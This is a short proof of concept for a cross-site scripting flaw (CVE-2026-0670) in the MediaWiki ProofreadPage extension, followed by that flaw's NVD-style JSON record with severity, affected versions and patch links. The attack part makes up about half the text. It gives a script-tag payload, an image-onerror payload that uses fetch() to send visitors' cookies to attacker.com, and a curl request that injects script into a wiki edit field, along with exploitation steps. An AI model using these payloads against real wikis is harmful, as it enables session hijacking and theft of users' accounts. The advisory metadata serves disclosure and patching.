CVE-2026-0670

// CVE-2026-0670 PoC - MediaWiki ProofreadPage XSS // This PoC demonstrates the XSS vulnerability in ProofreadPage extension // Malicious payload that can be injected into ProofreadPage input fields const xssPayload = '<script>alert("XSS - CVE-2026-0670")</script>'; const imgPayload = '<img src=x onerror="fetch(\"https://attacker.com/steal?cookie=\"+document.cookie)\">'; // Example exploitation scenario: // 1. Attacker accesses MediaWiki page with ProofreadPage extension // 2. Attacker modifies page content using ProofreadPage input // 3. Attacker injects XSS payload in page metadata or comments // 4. When other users view the page, the script executes // Sample curl request to demonstrate the vulnerability // curl -X POST 'https://target-wiki.com/index.php?title=Page:Test&action=submit' // -d 'wpTextbox1=<script>malicious_code</script>&wpProofreadPageState=some_state' // Detection pattern for vulnerable endpoints: // Look for ProofreadPage-related forms with insufficient input sanitization const detectionPattern = /action=proofread|proofreadpage|page_status/i; console.log('CVE-2026-0670 PoC for MediaWiki ProofreadPage XSS'); console.log('Payload examples:'); console.log('1. Script tag:', xssPayload); console.log('2. Image onerror:', imgPayload);

{"cve": {"id": "CVE-2026-0670", "sourceIdentifier": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "published": "2026-01-07T19:15:56.203", "lastModified": "2026-02-23T18:40:17.617", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki - ProofreadPage Extension allows Cross-Site Scripting (XSS).This issue affects MediaWiki - ProofreadPage Extension: 1.45, 1.44, 1.43, 1.39."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wikisource:proofread_page:1.39:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "F0DC7E84-26A6-4225-AB94-EE6124C11CC8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikisource:proofread_page:1.43:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "637AC797-C33D-4328-A8CD-C1E67F68457F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikisource:proofread_page:1.44:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "C05208D8-F063-424A-933A-37D5357A68C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikisource:proofread_page:1.45:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "7FA36D49-EE20-4805-85FE-820E37BC473E"}]}]}], "references": [{"url": "https://gerrit.wikimedia.org/r/q/I7c028db5ed81843aacd596b0ee4dc2980f5b6e3c", "source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "tags": ["Patch"]}, {"url": "https://phabricator.wikimedia.org/T409423", "source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "tags": ["Exploit", "Issue Tracking"]}]}}